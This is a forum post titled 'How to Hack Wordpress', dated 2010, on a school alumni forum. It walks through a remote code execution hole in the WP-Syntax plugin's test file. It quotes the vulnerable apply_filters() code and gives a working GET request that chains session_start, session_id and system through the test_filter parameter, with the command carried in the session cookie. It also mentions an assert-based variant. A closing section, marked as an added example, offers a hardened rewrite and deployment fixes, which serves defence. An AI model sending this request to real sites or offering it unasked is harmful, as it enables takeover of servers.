=> This is a forum for students and alumni of SMP 1 WONOSARI! Anyone who wants to reminisce or share stories can do so in this forum! Come liven it up! <=

    How to Hack Wordpress - Use WP-Syntax




    Post by Admin on Sun 11 Apr 2010 - 4:12

    The weakness/bug is in the code at test/index.php@132-150:

    function apply_filters($tag, $string)
    {
        // $test_filter is never initialised in this file before it is used
        global $test_filter;

        if (!isset($test_filter[$tag])) return $string;

        uksort($test_filter[$tag], "strnatcasecmp");

        foreach ($test_filter[$tag] as $priority => $functions)
        {
            if (is_null($functions)) continue;

            foreach($functions as $function)
            {
                // each callback receives the previous callback's return value
                $string = call_user_func_array($function, array($string));
            }
        }
        return $string;
    }

    The global variable test_filter is not defined, so register_globals = on
    makes it possible to pass an arbitrary value into the first parameter of
    call_user_func_array(). Considering the fact that this function is
    called in a loop and the returned value is assigned to the second parameter
    on every iteration, it is obvious that a user function can be called with
    a single parameter containing arbitrary data that can come from the
    environment, e.g. session id. There are several valid sequences of function
    calls that allow any code to be executed.

    GET /wp-content/plugins/wp-syntax/test/index.php?test_filter[wp_head][99][0]=session_start&test_filter[wp_head][99][1]=session_id&test_filter[wp_head][99][2]=system HTTP/1.0
    Host: localhost
    Cookie: PHPSESSID=dir
    Connection: close

    Initially session_start() is called, then the return value of session_id(), which
    contains the command to execute, is passed to system().


    This vector was found by ShAnKaR and improves the previous one by using
    a base64-encoded payload that broadens the char range that can be passed
    to the next function. Besides, assert() successfully executes arbitrary
    code being called in call_user_func_array() while the usage of eval() in
    this function is not possible.
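
For defenders, the root cause described in this post (an uninitialised global used as a callback registry, in a file reachable over HTTP) can be closed as in the hardened variant below. This is an added example, not code from the original post or from WP-Syntax; add_test_filter(), the CLI-only guard and the demo values are assumptions.

```php
<?php
// Added example, not WP-Syntax code. $test_filter and apply_filters() are the
// names from the post; add_test_filter() and the CLI guard are assumptions.

// Guard 1: a test harness has no reason to answer web requests.
if (PHP_SAPI !== 'cli') {
    http_response_code(404);
    exit;
}

// Guard 2: initialise the registry explicitly, so a request parameter named
// test_filter (register_globals = on) cannot pre-populate it.
$test_filter = array();

// Guard 3: callbacks enter the registry only as Closure objects created by
// code, never as function-name strings.
function add_test_filter($tag, Closure $function, $priority = 10)
{
    global $test_filter;
    $test_filter[$tag][$priority][] = $function;
}

function apply_filters($tag, $string)
{
    global $test_filter;

    if (!isset($test_filter[$tag]) || !is_array($test_filter[$tag])) return $string;

    uksort($test_filter[$tag], "strnatcasecmp");

    foreach ($test_filter[$tag] as $priority => $functions) {
        if (!is_array($functions)) continue;

        foreach ($functions as $function) {
            // Defence in depth: skip anything that is not a registered Closure.
            if (!($function instanceof Closure)) continue;
            $string = call_user_func_array($function, array($string));
        }
    }
    return $string;
}

// Constructed demo: one legitimate filter plus a string entry of the kind the
// request in the post supplies; the string entry is skipped.
add_test_filter('wp_head', function ($s) { return strtoupper($s); });
$test_filter['wp_head'][99][] = 'session_id';
echo apply_filters('wp_head', 'filtered'), "\n";
```

Removing the test/ directory from production installs and keeping register_globals off address the same exposure at the deployment level.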
